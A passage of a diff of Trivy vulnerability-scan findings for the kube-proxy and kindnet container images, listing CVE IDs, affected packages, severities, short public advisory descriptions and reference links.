"https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-7169", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-7169", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", - "https://github.com/shadow-maint/shadow/pull/97", - "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", - "https://security.gentoo.org/glsa/201805-09", - "https://ubuntu.com/security/notices/USN-5254-1", - "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-7169", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-7169", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/97", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201805-09", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5254-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", + }, + { + "type": "URL", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20220209214540-3681064d5158", + "packageName": "golang.org/x/sys", "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", - }, - { - "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "https://groups.google.com/g/golang-announce", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - ], - }, - "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": 